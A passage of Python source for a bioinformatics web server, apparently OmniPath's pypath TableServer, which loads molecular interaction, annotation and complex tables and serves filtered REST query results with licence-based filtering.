'bool',\n 'secreted': 'bool',\n 'plasma_membrane_transmembrane': 'bool',\n 'plasma_membrane_peripheral': 'bool',\n }\n )\n\n # the annotation attributes served for the cytoscape app\n cytoscape_attributes = {\n ('Zhong2015', 'type'),\n ('MatrixDB', 'mainclass'),\n ('Matrisome', ('mainclass', 'subclass', 'subsubclass')),\n # ('TFcensus', 'in TFcensus'),\n ('Locate', ('location', 'cls')),\n (\n 'Phosphatome',\n (\n 'family',\n 'subfamily',\n #'has_protein_substrates',\n )\n ),\n ('CancerSEA', 'state'),\n ('GO_Intercell', 'mainclass'),\n ('Adhesome', 'mainclass'),\n ('SignaLink3', 'pathway'),\n (\n 'HPA_secretome',\n (\n 'mainclass',\n #'secreted',\n )\n ),\n (\n 'OPM',\n (\n 'membrane',\n 'family',\n #'transmembrane',\n )\n ),\n ('KEGG', 'pathway'),\n #(\n #'CellPhoneDB',\n #(\n ## 'receptor',\n ## 'peripheral',\n ## 'secreted',\n ## 'transmembrane',\n ## 'receptor_class',\n ## 'secreted_class',\n #)\n #),\n ('kinase.com', ('group', 'family', 'subfamily')),\n ('Membranome', ('membrane',)),\n #('CSPA', 'in CSPA'),\n #('MSigDB', 'geneset'),\n #('Integrins', 'in Integrins'),\n ('HGNC', 'mainclass'),\n ('CPAD', ('pathway', 'effect_on_cancer', 'cancer', )),\n ('Signor', 'pathway'),\n ('Ramilowski2015', 'mainclass'),\n ('HPA_subcellular', 'location'),\n #('DisGeNet', 'disease'),\n ('Surfaceome', ('mainclass', 'subclasses')),\n ('IntOGen', 'role'),\n ('HPMR', ('role', 'mainclass', 'subclass', 'subsubclass')),\n #('CancerGeneCensus',\n #(\n ##'hallmark',\n ##'somatic',\n ##'germline',\n #'tumour_types_somatic',\n #'tumour_types_germline',\n #)\n #),\n #('DGIdb', 'category'),\n ('ComPPI', 'location'),\n ('Exocarta', 'vesicle'),\n ('Vesiclepedia', 'vesicle'),\n ('Ramilowski_location', 'location'),\n ('LRdb', ('role', 'cell_type')),\n }\n\n def __init__(\n self,\n input_files = None,\n only_tables = None,\n exclude_tables = None,\n ):\n \"\"\"\n Server based on ``pandas`` data frames.\n\n :param dict input_files:\n Paths to tables exported by the ``pypath.websrvtab`` module.\n \"\"\"\n\n session_mod.Logger.__init__(self, name = 'server')\n\n self._log('TableServer starting up.')\n\n self.input_files = copy.deepcopy(self.default_input_files)\n self.input_files.update(input_files or {})\n self.data = {}\n\n self.to_load = (\n self.data_query_types - common.to_set(exclude_tables)\n if only_tables is None else\n common.to_set(only_tables)\n )\n\n self._log('Datasets to load: %s.' % (', '.join(sorted(self.to_load))))\n\n self._read_tables()\n\n self._preprocess_interactions()\n self._preprocess_enzsub()\n self._preprocess_annotations()\n self._preprocess_complexes()\n self._preprocess_intercell()\n self._update_resources()\n\n BaseServer.__init__(self)\n self._log('TableServer startup ready.')\n\n\n def _read_tables(self):\n\n self._log('Loading data tables.')\n\n for name, fname in iteritems(self.input_files):\n\n if name not in self.to_load:\n\n continue\n\n fname_gz = f'{fname}.gz'\n fname = fname_gz if os.path.exists(fname_gz) else fname\n\n self._log('Loading dataset `%s` from file `%s`.' % (name, fname))\n\n if not os.path.exists(fname):\n\n self._log(\n 'Missing table: `%s`.' % fname\n )\n continue\n\n dtype = self.default_dtypes[name]\n\n self.data[name] = pd.read_csv(\n fname,\n sep = '\\t',\n index_col = False,\n dtype = dtype,\n )\n\n self._log(\n 'Table `%s` loaded from file `%s`.' % (name, fname)\n )\n\n\n def _network(self, req):\n\n hdr = ['nodes', 'edges', 'is_directed', 'sources']\n tbl = self.data['network'].field\n val = dict(zip(tbl.field, tbl.value))\n\n if b'format' in req.args and req.args[b'format'] == b'json':\n return json.dumps(val)\n else:\n return '%s\\n%s' % ('\\t'.join(hdr), '\\t'.join(\n [str(val[h]) for h in hdr]))\n\n\n def _preprocess_interactions(self):\n\n if 'interactions' not in self.data:\n\n return\n\n self._log('Preprocessing interactions.')\n tbl = self.data['interactions']\n tbl['set_sources'] = pd.Series(\n [set(s.split(';')) for s in tbl.sources]\n )\n tbl['set_dorothea_level'] = pd.Series(\n [\n set(s.split(';'))\n if not pd.isnull(s) else\n set([])\n for s in tbl.dorothea_level\n ]\n )\n\n\n def _preprocess_enzsub(self):\n\n if 'enzsub' not in self.data:\n\n return\n\n self._log('Preprocessing enzyme-substrate relationships.')\n tbl = self.data['enzsub']\n tbl['set_sources'] = pd.Series(\n [set(s.split(';')) for s in tbl.sources]\n )\n\n\n def _preprocess_complexes(self):\n\n if 'complexes' not in self.data:\n\n return\n\n self._log('Preprocessing complexes.')\n tbl = self.data['complexes']\n\n tbl = tbl[~tbl.components.isna()]\n\n with ignore_pandas_copywarn():\n\n tbl['set_sources'] = [set(s.split(';')) for s in tbl.sources]\n tbl['set_proteins'] = [set(c.split('_')) for c in tbl.components]\n\n self.data['complexes'] = tbl\n\n\n def _preprocess_annotations_old(self):\n\n if 'annotations' not in self.data:\n\n return\n\n renum = re.compile(r'[-\\d\\.]+')\n\n\n def _agg_values(vals):\n\n result = (\n '#'.join(sorted(set(str(ii) for ii in vals)))\n if not all(\n isinstance(i, (int, float)) or (\n isinstance(i, str) and\n i and (\n i is None or\n renum.match(i)\n )\n )\n for i in vals\n ) else\n ''\n )\n\n return result\n\n\n self._log('Preprocessing annotations.')\n\n self.data['annotations_summary'] = self.data['annotations'].groupby(\n ['source', 'label'],\n ).agg({'value': _agg_values}).reset_index(drop = False)\n\n\n def _preprocess_annotations(self):\n\n if 'annotations' not in self.data:\n\n return\n\n renum = re.compile(r'[-\\d\\.]+')\n\n\n self._log('Preprocessing annotations.')\n\n values_by_key = collections.defaultdict(set)\n\n # we need to do it this way as we are memory limited on the server\n # and pandas groupby is very memory intensive\n for row in self.data['annotations'].itertuples():\n\n value = (\n ''\n if (\n (\n not isinstance(row.value, bool) and\n isinstance(row.value, (int, float))\n ) or\n renum.match(row.value)\n ) else\n str(row.value)\n )\n\n values_by_key[(row.source, row.label)].add(value)\n\n for vals in values_by_key.values():\n\n if len(vals) > 1:\n\n vals.discard('')\n\n vals.discard('')\n vals.discard('nan')\n\n self.data['annotations_summary'] = pd.DataFrame(\n list(\n (source, label, '#'.join(sorted(values)))\n for (source, label), values in iteritems(values_by_key)\n ),\n columns = ['source', 'label', 'value'],\n )\n\n\n def _preprocess_intercell(self):\n\n if 'intercell' not in self.data:\n\n return\n\n self._log('Preprocessing intercell data.')\n tbl = self.data['intercell']\n tbl.drop('full_name', axis = 1, inplace = True, errors = 'ignore')\n self.data['intercell_summary'] = tbl.filter(\n ['category', 'parent', 'database'],\n ).drop_duplicates()\n\n\n def _update_resources(self):\n\n self._log('Updating resource information.')\n\n self._resources_dict = collections.defaultdict(dict)\n\n res_ctrl = resources_mod.get_controller()\n\n for query_type in self.data_query_types:\n\n if query_type not in self.data:\n\n continue\n\n tbl = self.data[query_type]\n\n # finding out what is the name of the column with the resources\n # as this is different across the tables\n for colname, argname in (\n ('database', 'databases'),\n ('sources', 'databases'),\n ('source', 'databases'),\n ('category', 'categories')\n ):\n\n if colname in tbl.columns:\n\n break\n\n # collecting all resource names\n values = sorted(set(\n itertools.chain(*(\n val.split(';') for val in getattr(tbl, colname)\n ))\n ))\n\n for db in values:\n\n if 'license' not in self._resources_dict[db]:\n\n license = res_ctrl.license(db)\n\n if license is None:\n\n msg = 'No license for resource `%s`.' % str(db)\n self._log(msg)\n raise RuntimeError(msg)\n\n license_data = license.features\n license_data['name'] = license.name\n license_data['full_name'] = license.full_name\n self._resources_dict[db]['license'] = license_data\n\n if 'queries' not in self._resources_dict[db]:\n\n self._resources_dict[db]['queries'] = {}\n\n if query_type not in self._resources_dict[db]['queries']:\n\n if query_type == 'interactions':\n\n datasets = set()\n\n for dataset in self.datasets_:\n\n if dataset not in tbl.columns:\n\n continue\n\n for in_dataset, resources in zip(\n getattr(tbl, dataset),\n tbl.set_sources,\n ):\n\n if in_dataset and db in resources:\n\n datasets.add(dataset)\n break\n\n self._resources_dict[db]['queries'][query_type] = {\n 'datasets': sorted(datasets),\n }\n\n elif query_type == 'intercell':\n\n tbl_db = tbl[\n (tbl.database == db) &\n (tbl.scope == 'generic')\n ]\n\n self._resources_dict[db]['queries'][query_type] = {\n 'generic_categories': sorted(\n set(tbl_db.category)\n ),\n }\n\n else:\n\n self._resources_dict[db]['queries'][query_type] = {}\n\n self.args_reference[query_type][argname] = values\n\n self._resources_dict = dict(self._resources_dict)\n\n self._log('Finished updating resource information.')\n\n\n def _check_args(self, req):\n\n result = []\n argname = req.postpath[0]\n ref = (\n self.args_reference['resources']\n if argname == 'databases' else\n self.args_reference[argname]\n )\n\n for arg, val in iteritems(req.args):\n\n arg = arg.decode('utf-8')\n\n if arg in ref:\n\n if not ref[arg] or not val:\n\n continue\n\n val = (\n {val[0]}\n if type(val[0]) is int else\n set(val[0].decode('utf-8').split(','))\n )\n\n unknowns = val - set(ref[arg])\n\n if unknowns:\n\n result.append(\n ' ==> Unknown values for argument `%s`: `%s`' % (\n arg,\n ', '.join(str(u) for u in unknowns)\n )\n )\n\n else:\n\n result.append(' ==> Unknown argument: `%s`' % arg)\n\n req.args[b'header'] = self._parse_arg(req.args[b'header'])\n\n if result:\n\n return (\n 'Something is not entirely good:\\n%s\\n\\n'\n 'Please check the examples at\\n'\n 'https://github.com/saezlab/pypath\\n'\n 'and\\n'\n 'https://github.com/saezlab/DoRothEA\\n'\n 'If you still experiencing issues contact us at\\n'\n 'https://github.com/saezlab/pypath/issues'\n '' % '\\n'.join(result)\n )\n\n\n def queries(self, req):\n\n query_type = (\n req.postpath[1]\n if len(req.postpath) > 1 else\n 'interactions'\n )\n\n query_type = self._query_type(query_type)\n\n query_param = (\n req.postpath[2]\n if len(req.postpath) > 2 else\n None\n )\n\n if query_type in self.args_reference:\n\n result = dict(\n (\n k,\n sorted(v) if isinstance(v, common.list_like) else v\n )\n for k, v in self.args_reference[query_type].items()\n )\n\n if query_param is not None and query_param in result:\n\n result = {query_param: result[query_param]}\n\n else:\n\n result = {}\n result[query_type] = (\n 'No possible arguments defined for'\n 'query `%s` or no such query available.' % query_type\n )\n\n result = self._dict_set_to_list(result)\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n return json.dumps(result)\n\n else:\n\n return 'argument\\tvalues\\n%s' % '\\n'.join(\n '%s\\t%s' % (\n k,\n ';'.join(v)\n if isinstance(v, (list, set, tuple)) else\n str(v)\n )\n for k, v in iteritems(result)\n )\n\n\n @classmethod\n def _dict_set_to_list(cls, dct):\n\n return dict(\n (\n key,\n (\n sorted(val)\n if isinstance(val, common.list_like) else\n cls._dict_set_to_list(val)\n if isinstance(val, dict) else\n val\n )\n )\n for key, val in iteritems(dct)\n )\n\n\n def databases(self, req):\n\n query_type = (\n req.postpath[1]\n if len(req.postpath) > 1 else\n 'interactions'\n )\n\n query_type = self._query_type(query_type)\n\n datasets = (\n set(req.postpath[2].split(','))\n if len(req.postpath) > 2 else\n None\n )\n\n tbl = (\n self.data[query_type]\n if query_type in self.data else\n self.data['interactions']\n )\n\n # filter for datasets\n if query_type == 'interactions':\n\n if datasets is not None:\n\n tbl = tbl.loc[tbl.type.isin(datasets)]\n\n else:\n\n datasets = self._get_datasets()\n\n result = {}\n\n for dataset in datasets:\n\n result[dataset] = sorted(set.union(\n *tbl[tbl.type == dataset].set_sources)\n )\n\n else:\n\n result = {}\n result['*'] = sorted(set.union(*tbl.set_sources))\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n return json.dumps(result)\n\n else:\n\n return 'dataset\\tresources\\n%s' % '\\n'.join(\n '%s\\t%s' % (k, ';'.join(v)) for k, v in iteritems(result)\n )\n\n\n def _get_datasets(self):\n\n return list(self.data['interactions'].type.unique())\n\n\n def datasets(self, req):\n\n query_type = (\n req.postpath[1]\n if len(req.postpath) > 1 else\n 'interactions'\n )\n\n if query_type == 'interactions':\n\n result = self._get_datasets()\n\n else:\n\n result = []\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n return json.dumps(result)\n\n else:\n\n return ';'.join(result)\n\n\n def interactions(\n self,\n req,\n datasets = {'omnipath'},\n databases = None,\n dorothea_levels = {'A', 'B'},\n organisms = {9606},\n source_target = 'OR',\n ):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n hdr = [\n 'source',\n 'target',\n 'is_directed',\n 'is_stimulation',\n 'is_inhibition',\n 'consensus_direction',\n 'consensus_stimulation',\n 'consensus_inhibition',\n ]\n\n if b'source_target' in req.args:\n\n source_target = (\n req.args[b'source_target'][0].decode('utf-8').upper()\n )\n\n # changes the old, \"tfregulons\" names to new \"dorothea\"\n self._tfregulons_dorothea(req)\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n args = {}\n\n for arg in (\n 'datasets',\n 'types',\n 'sources',\n 'targets',\n 'partners',\n 'resources',\n 'organisms',\n 'dorothea_levels',\n 'dorothea_methods',\n ):\n\n args[arg] = self._args_set(req, arg)\n\n # here adjust on the defaults otherwise we serve empty\n # response by default\n if not args['types']:\n\n args['datasets'] = args['datasets'] or datasets\n\n # keep only valid dataset names\n args['datasets'] = args['datasets'] & self.datasets_\n\n args['organisms'] = set(\n int(t) for t in args['organisms'] if t.isdigit()\n )\n args['organisms'] = args['organisms'] or organisms\n\n # do not allow impossible values\n # those would result KeyError later\n args['dorothea_levels'] = (\n args['dorothea_levels'] or\n dorothea_levels\n )\n args['dorothea_methods'] = (\n args['dorothea_methods'] & self.dorothea_methods\n )\n\n # provide genesymbols: yes or no\n if (\n b'genesymbols' in req.args and\n self._parse_arg(req.args[b'genesymbols'])\n ):\n genesymbols = True\n hdr.insert(2, 'source_genesymbol')\n hdr.insert(3, 'target_genesymbol')\n else:\n genesymbols = False\n\n self._log('Processed arguments: [%s].' % common.dict_str(args))\n\n # starting from the entire dataset\n tbl = self.data['interactions']\n\n # filter by type\n if args['types']:\n\n tbl = tbl.loc[tbl.type.isin(args['types'])]\n\n # if partners provided those will overwrite\n # sources and targets\n args['sources'] = args['sources'] or args['partners']\n args['targets'] = args['targets'] or args['partners']\n\n # then we filter by source and target\n # which matched against both standard names\n # and gene symbols\n if args['sources'] and args['targets'] and source_target == 'OR':\n\n tbl = tbl.loc[\n tbl.target.isin(args['targets']) |\n tbl.target_genesymbol.isin(args['targets']) |\n tbl.source.isin(args['sources']) |\n tbl.source_genesymbol.isin(args['sources'])\n ]\n\n else:\n\n if args['sources']:\n tbl = tbl.loc[\n tbl.source.isin(args['sources']) |\n tbl.source_genesymbol.isin(args['sources'])\n ]\n\n if args['targets']:\n tbl = tbl.loc[\n tbl.target.isin(args['targets']) |\n tbl.target_genesymbol.isin(args['targets'])\n ]\n\n # filter by datasets\n if args['datasets']:\n\n tbl = tbl.query(' or '.join(args['datasets']))\n\n # filter by organism\n tbl = tbl.loc[\n tbl.ncbi_tax_id_source.isin(args['organisms']) |\n tbl.ncbi_tax_id_target.isin(args['organisms'])\n ]\n\n dorothea_included = (\n 'dorothea' in args['datasets'] or\n any(res.endswith('DoRothEA') for res in args['resources']) or\n (\n 'transcriptional' in args['types'] and\n not args['datasets']\n )\n )\n\n # filter by DoRothEA confidence levels\n if dorothea_included and args['dorothea_levels']:\n\n tbl = tbl.loc[\n self._dorothea_dataset_filter(tbl, args) |\n [\n bool(levels & args['dorothea_levels'])\n for levels in tbl.set_dorothea_level\n ]\n ]\n\n # filter by databases\n if args['resources']:\n\n tbl = tbl.loc[\n [\n bool(sources & args['resources'])\n for sources in tbl.set_sources\n ]\n ]\n\n # filtering for entity types\n if b'entity_types' in req.args:\n\n entity_types = self._args_set(req, 'entity_types')\n\n if len(entity_types) == 1 and 'protein' in entity_types:\n\n # pandas is awful:\n tbl = tbl.loc[\n np.logical_and(\n tbl.entity_type_source.astype('string') == 'protein',\n tbl.entity_type_target.astype('string') == 'protein',\n )\n ]\n\n else:\n\n tbl = tbl.loc[\n tbl.entity_type_source.isin(entity_types) |\n tbl.entity_type_target.isin(entity_types)\n ]\n\n # filtering by DoRothEA methods\n if dorothea_included and args['dorothea_methods']:\n\n q = ['dorothea_%s' % m for m in args['dorothea_methods']]\n\n tbl = tbl.loc[\n self._dorothea_dataset_filter(tbl, args) |\n tbl[q].any(1)\n ]\n\n # filter directed & signed\n if (\n b'directed' not in req.args or\n self._parse_arg(req.args[b'directed'])\n ):\n\n tbl = tbl.loc[tbl.is_directed == 1]\n\n if (\n b'signed' in req.args and\n self._parse_arg(req.args[b'signed'])\n ):\n\n tbl = tbl.loc[np.logical_or(\n tbl.is_stimulation == 1,\n tbl.is_inhibition == 1\n )]\n\n # loops: remove by default\n if (\n b'loops' not in req.args or\n not self._parse_arg(req.args[b'loops'])\n ):\n\n # pandas is a disaster:\n tbl = tbl.loc[\n tbl.source.astype('string') !=\n tbl.target.astype('string')\n ]\n\n req.args[b'fields'] = req.args[b'fields'] or [b'']\n\n _fields = [\n f for f in\n req.args[b'fields'][0].decode('utf-8').split(',')\n if f in self.interaction_fields\n ]\n\n for f in (b'evidences', b'extra_attrs'):\n\n if f in req.uri and f not in req.args[b'fields'][0]:\n\n _fields.append(f.decode('utf-8'))\n\n for f in _fields:\n\n if f == 'ncbi_tax_id' or f == 'organism':\n\n hdr.append('ncbi_tax_id_source')\n hdr.append('ncbi_tax_id_target')\n\n elif f == 'entity_type':\n\n hdr.append('entity_type_source')\n hdr.append('entity_type_target')\n\n elif f in {'databases', 'resources'}:\n\n hdr.append('sources')\n\n elif f == 'datasets':\n\n hdr.extend(\n set(tbl.columns) &\n self.args_reference['interactions']['datasets'] &\n args['datasets']\n )\n\n else:\n\n hdr.append(f)\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_interactions(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n @classmethod\n def _dataset_included(cls, dataset: str, args: dict) -> bool:\n\n return (\n dataset in args['datasets'] or\n (\n not args['datasets'] and\n cls.dataset2type.get(dataset, None) in args['types']\n )\n )\n\n\n @classmethod\n def _dorothea_dataset_filter(cls, tbl: pd.DataFrame, args: dict):\n\n return (\n (\n # if the tf_target dataset is requested\n # we need to serve it including the parts which\n # don't fit the filters below\n cls._dataset_included('tf_target', args) &\n tbl.tf_target\n ) |\n (\n cls._dataset_included('collectri', args) &\n tbl.collectri\n )\n )\n\n\n def _tfregulons_dorothea(self, req):\n\n for arg in (b'datasets', b'fields'):\n\n if arg in req.args:\n\n req.args[arg] = [\n it.replace(b'tfregulons', b'dorothea')\n for it in req.args[arg]\n ]\n\n for postfix in (b'levels', b'methods'):\n\n key = b'tfregulons_%s' % postfix\n new_key = b'dorothea_%s' % postfix\n\n if key in req.args and new_key not in req.args:\n\n req.args[new_key] = req.args[key]\n _ = req.args.pop(key)\n\n\n def enzsub(\n self,\n req,\n organisms = {9606},\n enzyme_substrate = 'OR'\n ):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n hdr = [\n 'enzyme', 'substrate', 'residue_type',\n 'residue_offset', 'modification'\n ]\n\n if b'enzyme_substrate' in req.args:\n\n enzyme_substrate = (\n req.args[b'enzyme_substrate'][0].decode('utf-8').upper()\n )\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n args = {}\n\n for arg in (\n 'enzymes', 'substrates', 'partners',\n 'resources', 'organisms', 'types',\n 'residues'\n ):\n\n args[arg] = self._args_set(req, arg)\n\n args['organisms'] = set(\n int(t) for t in args['organisms'] if t.isdigit()\n )\n args['organisms'] = args['organisms'] or organisms\n\n # provide genesymbols: yes or no\n if (\n b'genesymbols' in req.args and\n self._parse_arg(req.args[b'genesymbols'])\n ):\n genesymbols = True\n hdr.insert(2, 'enzyme_genesymbol')\n hdr.insert(3, 'substrate_genesymbol')\n else:\n genesymbols = False\n\n # starting from the entire dataset\n tbl = self.data['enzsub']\n\n # filter by type\n if args['types']:\n tbl = tbl.loc[tbl.modification.isin(args['types'])]\n\n # if partners provided those will overwrite\n # enzymes and substrates\n args['enzymes'] = args['enzymes'] or args['partners']\n args['substrates'] = args['substrates'] or args['partners']\n\n # then we filter by enzyme and substrate\n # which matched against both standard names\n # and gene symbols\n if (\n args['enzymes'] and\n args['substrates'] and\n enzyme_substrate == 'OR'\n ):\n\n tbl = tbl.loc[\n tbl.substrate.isin(args['substrates']) |\n tbl.substrate_genesymbol.isin(args['substrates']) |\n tbl.enzyme.isin(args['enzymes']) |\n tbl.enzyme_genesymbol.isin(args['enzymes'])\n ]\n\n else:\n\n if args['enzymes']:\n tbl = tbl.loc[\n tbl.enzyme.isin(args['enzymes']) |\n tbl.enzyme_genesymbol.isin(args['enzymes'])\n ]\n\n if args['substrates']:\n tbl = tbl.loc[\n tbl.substrate.isin(args['substrates']) |\n tbl.substrate_genesymbol.isin(args['substrates'])\n ]\n\n # filter by organism\n tbl = tbl.loc[tbl.ncbi_tax_id.isin(args['organisms'])]\n\n # filter by databases\n if args['resources']:\n\n tbl = tbl.loc[\n [\n bool(args['resources'] & sources)\n for sources in tbl.set_sources\n ]\n ]\n\n if req.args[b'fields']:\n\n _fields = [\n f for f in\n req.args[b'fields'][0].decode('utf-8').split(',')\n if f in self.enzsub_fields\n ]\n\n for f in _fields:\n\n if f == 'ncbi_tax_id' or f == 'organism':\n\n hdr.append('ncbi_tax_id')\n\n elif f in {'databases', 'resources'}:\n\n hdr.append('sources')\n\n else:\n\n hdr.append(f)\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_interactions(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def ptms(self, req):\n\n req.postpath[0] = 'enzsub'\n\n return self.enzsub(req)\n\n\n def enz_sub(self, req):\n\n req.postpath[0] = 'enzsub'\n\n return self.enzsub(req)\n\n\n def annotations(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n if (\n not settings.get('server_annotations_full_download') and\n not b'resources' in req.args and\n not b'proteins' in req.args\n ):\n\n return (\n 'Downloading the entire annotations database by the REST '\n 'API is not allowed because of its huge size (>1GB). '\n 'We recommend to query a set of proteins or a few '\n 'resources, depending on your interest. '\n 'You can always download the full database from '\n 'https://archive.omnipathdb.org/'\n 'omnipath_webservice_annotations__recent.tsv'\n )\n\n # starting from the entire dataset\n tbl = self.data['annotations']\n\n hdr = tbl.columns\n\n # filtering for resources\n if b'resources' in req.args:\n\n resources = self._args_set(req, 'resources')\n\n tbl = tbl.loc[tbl.source.isin(resources)]\n\n # filtering for entity types\n if b'entity_types' in req.args:\n\n entity_types = self._args_set(req, 'entity_types')\n\n tbl = tbl.loc[tbl.entity_type.isin(entity_types)]\n\n # filtering for proteins\n if b'proteins' in req.args:\n\n proteins = self._args_set(req, 'proteins')\n\n tbl = tbl.loc[\n tbl.uniprot.isin(proteins) |\n tbl.genesymbol.isin(proteins)\n ]\n\n # provide genesymbols: yes or no\n if (\n b'genesymbols' in req.args and\n self._parse_arg(req.args[b'genesymbols'])\n ):\n genesymbols = True\n hdr.insert(1, 'genesymbol')\n else:\n genesymbols = False\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_annotations(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def annotations_summary(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n # starting from the entire dataset\n tbl = self.data['annotations_summary']\n\n hdr = tbl.columns\n\n # filtering for resources\n if b'resources' in req.args:\n\n resources = self._args_set(req, 'resources')\n\n tbl = tbl.loc[tbl.source.isin(resources)]\n\n if (\n b'cytoscape' in req.args and\n self._parse_arg(req.args[b'cytoscape'])\n ):\n\n cytoscape = True\n\n else:\n\n cytoscape = False\n\n tbl = tbl.loc[:,hdr]\n\n if cytoscape:\n\n tbl = tbl.set_index(['source', 'label'], drop = False)\n\n cytoscape_keys = {\n (source, label)\n for source, labels in self.cytoscape_attributes\n for label in (\n labels if isinstance(labels, tuple) else (labels,)\n )\n } & set(tbl.index)\n\n tbl = tbl.loc[list(cytoscape_keys)]\n\n return self._serve_dataframe(tbl, req)\n\n\n def intercell(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n\n # starting from the entire dataset\n tbl = self.data['intercell']\n\n hdr = tbl.columns\n\n # filtering for category types\n for var in (\n 'aspect',\n 'source',\n 'scope',\n 'transmitter',\n 'receiver',\n 'parent',\n 'resources',\n ):\n\n if var.encode('ascii') in req.args:\n\n values = self._args_set(req, var)\n\n if var in {'resources', 'databases'}:\n\n var = 'database'\n\n tbl = tbl.loc[getattr(tbl, var).isin(values)]\n\n for (_long, short) in (\n ('transmitter', 'trans'),\n ('receiver', 'rec'),\n ('secreted', 'sec'),\n ('plasma_membrane_peripheral', 'pmp'),\n ('plasma_membrane_transmembrane', 'pmtm'),\n ):\n\n this_arg = None\n _long_b = _long.encode('ascii')\n short_b = short.encode('ascii')\n\n if _long_b in req.args:\n\n this_arg = self._parse_arg(req.args[_long_b])\n\n elif short_b in req.args:\n\n this_arg = self._parse_arg(req.args[short_b])\n\n if this_arg is not None:\n\n tbl = tbl.loc[getattr(tbl, _long) == this_arg]\n\n if b'causality' in req.args:\n\n causality = self._args_set(req, 'causality')\n\n trans = causality & {'transmitter', 'trans', 'both'}\n rec = causality & {'receiver', 'rec', 'both'}\n tbl = (\n tbl.loc[tbl.transmitter | tbl.receiver]\n if trans and rec else\n tbl.loc[tbl.transmitter]\n if trans else\n tbl.loc[tbl.receiver]\n if rec else\n tbl\n )\n\n if b'topology' in req.args:\n\n topology = self._args_set(req, 'topology')\n query = ' or '.join(\n colname\n for enabled, colname in\n (\n (topology & {'secreted', 'sec'}, 'secreted'),\n (\n topology & {'plasma_membrane_peripheral', 'pmp'},\n 'plasma_membrane_peripheral'\n ),\n (\n topology & {'plasma_membrane_transmembrane', 'pmtm'},\n 'plasma_membrane_transmembrane'\n )\n )\n if enabled\n )\n\n if query:\n\n tbl = tbl.query(query)\n\n # filtering for categories\n if b'categories' in req.args:\n\n categories = self._args_set(req, 'categories')\n\n tbl = tbl.loc[tbl.category.isin(categories)]\n\n # filtering for entity types\n if b'entity_types' in req.args:\n\n entity_types = self._args_set(req, 'entity_types')\n\n tbl = tbl.loc[tbl.entity_type.isin(entity_types)]\n\n # filtering for proteins\n if b'proteins' in req.args:\n\n proteins = self._args_set(req, 'proteins')\n\n tbl = tbl.loc[\n np.logical_or(\n tbl.uniprot.isin(proteins),\n tbl.genesymbol.isin(proteins),\n )\n ]\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_intercell(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def intercell_summary(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n # starting from the entire dataset\n tbl = self.data['intercell_summary']\n\n hdr = tbl.columns\n\n # filtering for category types\n for var in (\n 'aspect',\n 'source',\n 'scope',\n 'transmitter',\n 'receiver',\n 'parent',\n 'resources',\n ):\n\n if var.encode('ascii') in req.args:\n\n values = self._args_set(req, var)\n\n tbl = tbl.loc[getattr(tbl, var).isin(values)]\n\n # filtering for categories\n if b'categories' in req.args:\n\n categories = self._args_set(req, 'categories')\n\n tbl = tbl.loc[tbl.category.isin(categories)]\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def complexes(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n # starting from the entire dataset\n tbl = self.data['complexes']\n\n hdr = list(tbl.columns)\n hdr.remove('set_sources')\n hdr.remove('set_proteins')\n\n # filtering for resources\n if b'resources' in req.args:\n\n resources = self._args_set(req, 'resources')\n\n tbl = tbl.loc[\n [\n bool(sources & resources)\n for sources in tbl.set_sources\n ]\n ]\n\n # filtering for proteins\n if b'proteins' in req.args:\n\n proteins = self._args_set(req, 'proteins')\n\n tbl = tbl.loc[\n [\n bool(this_proteins & proteins)\n for this_proteins in tbl.set_proteins\n ]\n ]\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_complexes(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def resources(self, req):\n\n datasets = (\n\n {\n self._query_type(dataset.decode('ascii'))\n for dataset in req.args[b'datasets']\n }\n\n if b'datasets' in req.args else\n\n None\n\n )\n\n res_ctrl = resources_mod.get_controller()\n license = self._get_license(req)\n\n return json.dumps(\n dict(\n (k, v)\n for k, v in iteritems(self._resources_dict)\n if (\n res_ctrl.license(k).enables(license) and\n (\n not datasets or\n datasets & set(v['datasets'].keys())\n )\n )\n )\n )\n\n\n\n @staticmethod\n def _get_license(req):\n\n return req.args[b'license'][0].decode('utf-8')\n\n\n @classmethod\n def _filter_by_license_complexes(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = tbl,\n license = license,\n res_col = 'sources',\n simple = False,\n prefix_col = 'identifiers',\n )\n\n\n @classmethod\n def _filter_by_license_interactions(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = tbl,\n license = license,\n res_col = 'sources',\n simple = False,\n prefix_col = 'references',\n )\n\n\n @classmethod\n def _filter_by_license_annotations(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = 